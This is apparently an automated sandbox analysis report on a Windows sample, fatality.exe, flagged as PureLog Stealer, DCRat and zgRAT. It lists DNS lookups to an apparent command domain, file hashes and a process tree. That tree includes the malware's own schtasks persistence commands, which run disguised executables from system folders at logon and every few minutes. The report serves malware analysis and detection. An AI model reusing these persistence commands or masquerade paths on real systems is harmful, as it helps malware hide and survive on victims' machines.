                                                                  Jan 13, 2025 12:49:11.735621929 CET1.1.1.1192.168.2.50xaf4eServer failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 12:49:19.453996897 CET1.1.1.1192.168.2.50x1670Server failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 12:49:27.429466963 CET1.1.1.1192.168.2.50xc892Server failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 12:49:51.131388903 CET1.1.1.1192.168.2.50x34dcServer failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 12:49:59.674460888 CET1.1.1.1192.168.2.50x74a0Server failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 12:50:06.503123999 CET1.1.1.1192.168.2.50x238aServer failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:06:47:59
                                                                  Start date:13/01/2025
                                                                  Path:C:\Users\user\Desktop\fatality.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\fatality.exe"
                                                                  Imagebase:0xde0000
                                                                  File size:3'319'076 bytes
                                                                  MD5 hash:A7040B85FC683F088F4C6E5B44052C43
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2039419279.0000000005FE3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2038554623.0000000005FE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:06:48:00
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe"
                                                                  Imagebase:0x290000
                                                                  File size:147'456 bytes
                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:06:48:11
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:06:48:11
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:06:48:11
                                                                  Start date:13/01/2025
                                                                  Path:C:\blockcomSession\containerReview.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\blockcomSession/containerReview.exe"
                                                                  Imagebase:0x780000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2154251143.0000000000782000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2227774812.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 83%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:06:48:14
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 10 /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:06:48:14
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:8
                                                                  Start time:06:48:14
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:9
                                                                  Start time:06:48:14
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline"
                                                                  Imagebase:0x7ff7080b0000
                                                                  File size:2'759'232 bytes
                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:10
                                                                  Start time:06:48:14
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:06:48:14
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8539.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4E919528C4A844BA8820AEF1C7C5AE5.TMP"
                                                                  Imagebase:0x7ff61b250000
                                                                  File size:52'744 bytes
                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:13
                                                                  Start time:06:48:15
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.cmdline"
                                                                  Imagebase:0x7ff7080b0000
                                                                  File size:2'759'232 bytes
                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:06:48:15
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:15
                                                                  Start time:06:48:15
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87BA.tmp" "c:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMP"
                                                                  Imagebase:0x7ff61b250000
                                                                  File size:52'744 bytes
                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:16
                                                                  Start time:06:48:15
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 13 /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:17
                                                                  Start time:06:48:16
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:18
                                                                  Start time:06:48:16
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:19
                                                                  Start time:06:48:16
                                                                  Start date:13/01/2025
                                                                  Path:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  Imagebase:0x300000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 83%, ReversingLabs
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:20
                                                                  Start time:06:48:16
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\dbg\containerReview.exe'" /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:21
                                                                  Start time:06:48:16
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\Users\All Users\dbg\containerReview.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:22
                                                                  Start time:06:48:16
                                                                  Start date:13/01/2025
                                                                  Path:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  Imagebase:0xf10000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:23
                                                                  Start time:06:48:16
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\dbg\containerReview.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:24
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:25
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:26
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:27
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe'" /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:28
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:29
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:30
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 10 /tr "'C:\blockcomSession\containerReview.exe'" /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:31
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:32
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 10 /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:33
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat"
                                                                  Imagebase:0x7ff768690000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:34
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:35
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff75da30000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:36
                                                                  Start time:06:48:18
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\w32tm.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                  Imagebase:0x7ff73b7a0000
                                                                  File size:108'032 bytes
                                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:37
                                                                  Start time:06:48:19
                                                                  Start date:13/01/2025
                                                                  Path:C:\blockcomSession\containerReview.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\blockcomSession\containerReview.exe
                                                                  Imagebase:0xba0000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:38
                                                                  Start time:06:48:19
                                                                  Start date:13/01/2025
                                                                  Path:C:\blockcomSession\containerReview.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\blockcomSession\containerReview.exe
                                                                  Imagebase:0xa30000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:39
                                                                  Start time:06:48:23
                                                                  Start date:13/01/2025
                                                                  Path:C:\ProgramData\dbg\containerReview.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\All Users\dbg\containerReview.exe"
                                                                  Imagebase:0x770000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\dbg\containerReview.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\dbg\containerReview.exe, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 83%, ReversingLabs
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:40
                                                                  Start time:06:48:24
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2BGdjLelXV.bat"
                                                                  Imagebase:0x7ff768690000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:41
                                                                  Start time:06:48:24
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:42
                                                                  Start time:06:48:24
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff75da30000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:43
                                                                  Start time:06:48:24
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\w32tm.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                  Imagebase:0x7ff73b7a0000
                                                                  File size:108'032 bytes
                                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:44
                                                                  Start time:06:48:27
                                                                  Start date:13/01/2025
                                                                  Path:C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe"
                                                                  Imagebase:0xe30000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 83%, ReversingLabs
